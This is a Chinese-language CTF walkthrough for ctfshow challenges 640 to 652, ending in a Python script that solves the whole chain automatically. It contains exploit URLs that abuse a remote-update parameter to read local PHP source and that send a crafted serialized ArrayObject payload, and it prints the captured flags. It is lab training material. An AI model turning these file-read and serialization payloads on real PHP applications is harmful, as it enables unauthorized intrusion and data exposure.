CTFSHOW 终极考核

随便玩玩

题目

640

签到

641

主页响应头中

642

主页敏感文件路径泄露

/system36d/

查看源码

643

644 进入之后使用网络抓包,抓包之后执行 ls 发现 secret.txt

/system36d/secret.txt

644

/system36d/static/js/lock/index.js

以及获得密码 0x36D

645

数据备份得到的 backup.dat 中

646

远程更新抓包,看看之前源码泄露发现的 init.php

1
/system36d/users.php?action=remoteUpdate&auth=ctfshow%7B28b00f799c2e059bafaa1d6bda138d89%7D&update_address=/var/www/html/system36d/init.php

647

1
/system36d/users.php?action=evilString&m=localeconv

648

1
/system36d/users.php?action=evilClass&m=1&key=flag_647=ctfshow{e6ad8304cdb562971999b476d8922219}

649

1
/system36d/users.php?action=evilNumber&m=16&key=flag_648=ctfshow{af5b5e411813eafd8dc2311df30b394e}

650

1
/system36d/users.php?action=evilFunction&m=localeconv&key=flag_649=ctfshow{9ad80fcc305b58afbb3a0c2097ac40ef}

651

1
/system36d/users.php?action=evilArray&m=C:11:"ArrayObject":58:{x:i:0;a:2:{s:8:"username";i:1;i:0;s:7:"ctfshow";};m:a:0:{}}&key=flag_650=ctfshow{5eae22d9973a16a0d37c9854504b3029}

652

一键脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
import requests
from urllib import parse

url = "http://fd74b994-4665-4bfa-8aa3-2226427c3240.challenge.ctf.show:8080/"
flag = {}
header = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 '
'Safari/537.36',
}


def ctf_640(conn):
res = conn.get(url, headers=header)
if res.status_code == 200:
l = res.text.split("\n")
flag_640 = l[24]
flag[640] = flag_640
else:
print("640 出错辣!")
exit(123)


def ctf_641(conn):
res = conn.get(url, headers=header)
if res.status_code == 200:
flag_641 = res.headers["Flag"]
flag[641] = flag_641
else:
print("641 出错辣!")
exit(123)


def ctf_642(conn):
res = conn.get(url + "/system36d/users.php?action=remoteUpdate&auth=" + flag[645].replace("flag_645=", "") +
"&update_address=/var/www/html/system36d/index.php", headers=header, allow_redirects=False)
if res.status_code == 200:
l = res.text.split("\n")
flag_642 = l[0][638: 688]
flag[642] = flag_642
else:
print("642 出错辣!")
exit(123)
pass


def ctf_643(conn):
res = conn.get(url + "/system36d/secret.txt", headers=header)
if res.status_code == 200:
flag_643 = parse.unquote(res.text)
flag[643] = flag_643
else:
print("643 出错辣!")
exit(123)


def ctf_644(conn):
res = conn.get(url + "/system36d/static/js/lock/index.js", headers=header)
if res.status_code == 200:
l = res.text.split("\n")
flag_644 = l[45].replace(" document.getElementById('lock').innerHTML='", "").replace("';", "")
flag[644] = flag_644
else:
print("644 出错辣!")
exit(123)


def ctf_645(conn):
res = conn.get(url + "/system36d/users.php?action=backup", headers=header)
if res.status_code == 200:
flag_645 = res.text.replace("aab@aab|a1@bbb123|a2@bbb123|a3@bbb123|a4@bbb123|a5@bbb123|a6@bbb123|a11@bbb123"
"|a111@bbb123|a112@bbb123|a113@bbb123|a114@bbb1234|admin@", "").replace("|", "")
flag[645] = flag_645
else:
print("645 出错辣!")
exit(123)


def ctf_646(conn):
res = conn.get(url + "/system36d/users.php?action=remoteUpdate&auth=" + flag[645].replace("flag_645=", "") +
"&update_address=/var/www/html/system36d/init.php", headers=header)
if res.status_code == 200:
flag_646 = res.text[431: 480]
flag[646] = flag_646
else:
print("646 出错辣!")
exit(123)


def ctf_647(conn):
res = conn.get(url + "/system36d/users.php?action=evilString&m=localeconv", headers=header)
if res.status_code == 200:
flag_647 = res.text
flag[647] = flag_647
else:
print("647 出错辣!")
exit(123)


def ctf_648(conn):
res = conn.get(url + "/system36d/users.php?action=evilClass&m=1&key=" + flag[647], headers=header)
if res.status_code == 200:
flag_648 = res.text
flag[648] = flag_648
else:
print("648 出错辣!")
exit(123)


def ctf_649(conn):
while True:
res = conn.get(url + "/system36d/users.php?action=evilNumber&m=16&key=" + flag[648], headers=header)
if res.status_code == 200:
if "number is right?" in res.text:
continue
flag_649 = res.text
flag[649] = flag_649
break
else:
print("649 出错辣!")
exit(123)


def ctf_650(conn):
res = conn.get(url + "/system36d/users.php?action=evilFunction&m=localeconv&key=" + flag[649], headers=header)
if res.status_code == 200:
flag_650 = res.text
flag[650] = flag_650
else:
print("650 出错辣!")
exit(123)


def ctf_651(conn):
res = conn.get(url + '/system36d/users.php?action=evilArray&m=C:11:"ArrayObject":58:{x:i:0;a:2:{'
's:8:"username";i:1;i:0;s:7:"ctfshow";};m:a:0:{}}&key=' + flag[650], headers=header)
if res.status_code == 200:
flag_651 = res.text
flag[651] = flag_651
else:
print("651 出错辣!")
exit(123)


if __name__ == "__main__":
conn = requests.session()
ctf_640(conn)
ctf_641(conn)
ctf_643(conn)
ctf_644(conn)
ctf_645(conn)
ctf_646(conn)
ctf_642(conn)
ctf_647(conn)
ctf_648(conn)
ctf_649(conn)
ctf_650(conn)
ctf_651(conn)
for i in sorted(flag):
print(flag[i])